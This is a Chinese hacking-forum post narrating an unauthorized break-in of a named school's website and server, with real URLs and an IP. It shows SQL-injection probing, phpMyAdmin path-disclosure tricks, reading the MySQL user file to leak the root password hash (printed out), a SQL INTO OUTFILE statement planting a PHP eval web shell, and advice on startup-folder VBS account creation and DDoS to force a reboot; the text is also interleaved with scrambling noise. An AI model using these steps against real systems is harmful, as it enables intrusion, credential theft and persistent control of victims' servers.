找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2662|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
, R: J; m+ [! P0 A4 k+ c发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
) u% E  y. }2 O9 ]( E# Y* ~0 k9 p7 e+ q, V* D# I1 [
9 L; F6 @$ V, c! z

" t6 r- w9 K  t  y4 Y$ T/ C2 l" n) q- }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
- q- r: L) K1 C7 f! b- d, o9 y: Y0 d0 t+ v7 o
那么想可以直接写入shell ,getshell有几个条件:
% D7 L' V( @; Z: A: J! K! E
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF. j8 O/ ~0 |* }& L  p5 x8 w( \

4 }8 A0 R& \+ N! \& E试着爆绝对路径:
6 L$ ~3 t8 |# v! t3 P5 X6 ]1./phpMyAdmin/index.php?lang[]=1  * b+ b3 ^' z' D* H8 f1 q
2./phpMyAdmin/phpinfo.php  
% Q( M& J% P0 B: ?9 K3./load_file()  
5 g6 ~& X- O/ l5 R; \( P* R! ?4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
# q2 E  |; [% |% M5./phpmyadmin/libraries/select_lang.lib.php  
' Z8 _, e8 n' e  U, j8 G6./phpmyadmin/libraries/lect_lang.lib.php  
  e0 ^& r) I  P3 L6 A  C7./phpmyadmin/libraries/mcrypt.lib.php   - ]" p& D0 F% V3 a; N
8./phpmyadmin/libraries/export/xls.php  7 J4 V, [6 m& X/ L- f1 Y

! J) T: J9 v4 |' T7 c均不行...........................$ l8 r' K7 C' I- x* e
6 U- X" A8 a$ A5 _' D  B
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php/ F, y& U* d$ c+ T# }& b- m
8 n9 p& _& n$ A2 o( \; v
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 1 N/ @' i- a( u5 O! x
  |# m. L' t% C4 X: n
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
, \( Q# o- `0 I( h8 l
% W: j7 H9 P  ?, a: h敏感东西:http://202.103.49.66/Admincp.php  社工进不去.........../ z7 X3 H+ h6 W4 b4 M% J5 c+ O2 d: l
# X3 k* c) J# g; d
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
& X$ w9 Z8 u( ]1 p2 S2 d: U' d" t3 t8 I6 w/ H! K. l% p
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
! m2 c' {) c8 G+ v6 [/ V
7 s( g, ]$ W5 x自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
' ?( i* c& }' I
9 N* o6 W+ [- y* q成功读到root密码:* X' l7 B. V) V

1 _2 W8 S1 o; @5 i% i17---- r(0072)1 e0 c5 B) M' n+ c+ j3 f: e- k
18---- o(006f)# ^6 V$ u1 C4 B- Q7 g7 Y; M
19---- o(006f): l# a' a/ D) c# S, M- V) `
20---- t(0074)( f, R7 s* w) L0 F, s- ]
21---- *(002a)
: i5 p! e' R0 H9 M22---- 8(0038)1 n0 k, F/ x  f' E+ E- Z  I$ p! q
23---- 2(0032)
' P+ D3 J" D6 X1 N3 V8 q8 e24---- E(0045)
4 p3 i! r4 i/ F! z! @25---- 1(0031)- n# _) U5 U7 x! S& _8 b' O, {
26---- C(0043)/ I; t$ @  o% k3 b, \% u8 j
27---- 5(0035)
& Y9 t. X' e8 ]8 ]7 m28---- 8(0038), B1 U! x$ _) Z! t8 c+ \/ b
29---- 2(0032)4 [' p8 g3 L! \; j5 S) g
30---- 8(0038)
1 l$ b; e+ N7 u; K) w; M  N31---- A(0041)  a- H5 g, p4 k& c
32---- 9(0039)
5 n' o* s  X- g& W7 z7 H33---- B(0042)$ _" _3 W$ y4 A3 n+ g7 ~. J) X. V
34---- 5(0035)5 F) _) F, k2 k3 \
35---- 4(0034)
; [/ X3 s  [$ N" z( t# K- f- V36---- 8(0038)8 w/ A0 b+ z6 p0 p6 p
37---- 6(0036)( I4 W: e% W. h8 n% h) N
38---- 4(0034): r0 J3 }' e3 q+ E! S
39---- 9(0039). t# z$ r$ z. P3 A. J6 a
40---- 1(0031)( e/ j' L0 F3 h( O
41---- 1(0031)' p" W; o; T8 c, J
42---- 5(0035)
) J2 b! P- S9 Q43---- 3(0033)
! {) x! K( ?9 s  J# x( }& d  @* M44---- 5(0035)
9 Y  ^# b5 {! j1 v4 Q5 G  c45---- 9(0039)5 m% g8 ~5 k6 t
46---- 8(0038)
8 A/ m9 m8 G4 C* k# t4 k47---- F(0046); C5 o: H7 I7 Z& o8 [4 g- F8 Z9 A
48---- F(0046)
( l7 I$ b& f3 t( X! H49---- 4(0034)
2 W; S1 N" s) `50---- F(0046)
% N$ I5 J9 m" i" V6 o( M51---- 0(0030)
# |# w( W  e1 q" L. \' \! p52---- 3(0033)2 S6 ]* F( m6 ?$ b$ u6 }
53---- 2(0032)
+ Y4 L, H: k2 J7 |0 Y54---- A(0041)
) d. N. F# O1 l. {$ }" o+ I) y55---- 4(0034)( G2 `" I7 {) N; J) V  |9 j
56---- A(0041)( d/ B6 Q% N/ n/ E* |
57---- B(0042)
; `8 }% H& @7 x9 b' y8 U2 J) r& c8 @58---- *(0044)9 `1 J, f1 s6 A
59---- *(0035)
: Z3 _9 H: F$ G6 i60---- *(0041)/ b- F3 K$ M) s1 k4 ^
61---- *0032)
& [/ g! b# Z6 v; e
5 b# G  q0 P9 L5 P% B解密后成功登陆phpmyamin
* @; Z& Q8 ]7 N9 p+ k8 `                          
& z2 g# G/ c, x5 q" K3 o/ y' h, `% {7 g6 u
                             
* h7 W, I5 x6 D( D0 Z; l; I; n) i& j( N7 ^9 d- F5 \- \7 S* \
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'4 E& k: X$ l9 l! b! I

# L4 Y+ y. M+ |+ Q0 z成功执行,拿下shell,菜刀连接:) |* ^/ D+ B' h

5 L. U5 k) Z8 Y$ E( K% f. U4 G服务器不支持asp,aspx,php提权无果...................9 A6 [2 Q- Q( h. j9 o. k/ y5 y

& s) Q" C, Y2 f4 u) A9 p但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:& L9 i: g! H' B9 o+ h  s+ L% K
服务器上已经有个隐藏帐号了
9 W( e2 u: N0 `3 `
别名     administrators
" p+ N0 z& Q; _+ h4 C注释     管理员对计算机/域有不受限制的完全访问权

$ [0 F9 J* e9 z- m
成员

# W- ~) [; {) Y1 G. x7 w
-------------------------------------------------------------------------------2 C& z' Y4 P% C  b! O9 {
admin/ I$ e$ ?5 o* t1 A
Administrator: q0 e5 `) ]  T0 _* o4 [2 e3 P
slipper$
2 X0 a1 s- A& I3 Csqluser6 T4 S7 L4 F+ |  h+ [9 `$ x! E, L
命令成功完成。
- H9 M3 S2 }, ~7 J/ ]# P1 ^+ B9 I/ {# a
4 }1 i- T% ?1 c- _9 q服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
2 P3 P/ a5 \+ L' h
/ e7 c3 W; g; B# v7 _ddos服务器重启,不然就只能坐等服务器重启了..............................." ^) k5 Y# f% f" Y

2 ~# J; {1 ]; N4 p* j) w. Z) u. _      
2 ]4 l0 A. G1 h: J( ^6 C1 `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表